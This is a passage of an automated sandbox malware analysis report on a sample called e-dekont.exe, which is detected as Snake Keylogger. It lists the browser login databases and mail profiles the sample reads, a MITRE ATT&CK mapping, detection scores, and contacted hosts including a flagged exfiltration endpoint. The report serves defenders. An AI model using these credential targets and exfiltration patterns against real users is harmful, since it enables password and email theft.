            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Users\user\Desktop\e-dekont.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\e-dekont.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\e-dekont.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		111
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            Query Registry            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory1
            Security Software Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Software Packing            		DCSync13
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            e-dekont.exe61%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            e-dekont.exe62%VirustotalBrowse
            e-dekont.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            reallyfreegeoip.org2%VirustotalBrowse
            scratchdreams.tk17%VirustotalBrowse
            checkip.dyndns.com0%VirustotalBrowse
            checkip.dyndns.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.tiro.com0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            http://checkip.dyndns.org/q0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://reallyfreegeoip.org0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://checkip.dyndns.com0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/154.16.105.36$0%Avira URL Cloudsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%Avira URL Cloudsafe
            http://tempuri.org/DataSet1.xsd2%VirustotalBrowse
            https://scratchdreams.tk100%Avira URL Cloudmalware
            http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
            http://www.founder.com.cn/cn0%VirustotalBrowse
            https://reallyfreegeoip.org/xml/154.16.105.360%Avira URL Cloudsafe
            https://scratchdreams.tk16%VirustotalBrowse
            https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
            http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
            http://scratchdreams.tk100%Avira URL Cloudmalware
            https://scratchdreams.tk/_send_.php?TS14%VirustotalBrowse
            http://www.zhongyicts.com.cn1%VirustotalBrowse
            http://scratchdreams.tk17%VirustotalBrowse
            http://www.founder.com.cn/cn/cThe0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            		104.21.67.152
            		truefalseunknown
            scratchdreams.tk
            		104.21.27.85
            		truefalseunknown
            checkip.dyndns.com
            		158.101.44.242
            		truefalseunknown
            checkip.dyndns.org
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://checkip.dyndns.org/false
            • URL Reputation: safe
            		unknown
            https://reallyfreegeoip.org/xml/154.16.105.36false
            • Avira URL Cloud: safe
            		unknown
            https://scratchdreams.tk/_send_.php?TSfalse
            • 14%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.fontbureau.come-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.com/designersGe-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bThee-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers?e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://reallyfreegeoip.org/xml/154.16.105.36$e-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030AB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/DataSet1.xsde-dekont.exefalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tiro.come-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://checkip.dyndns.orge-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030AB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003068000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003056000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003131000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designerse-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.goodfont.co.kre-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.comle-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.come-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDe-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNe-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/cThee-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htme-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cne-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-user.htmle-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://checkip.dyndns.org/qe-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/e-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://scratchdreams.tke-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • 16%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            http://reallyfreegeoip.orge-dekont.exe, 00000002.00000002.4088425866.0000000003124000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003116000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000030FB000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003150000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003081000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleasee-dekont.exe, 00000000.00000002.1664799082.0000000006C42000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
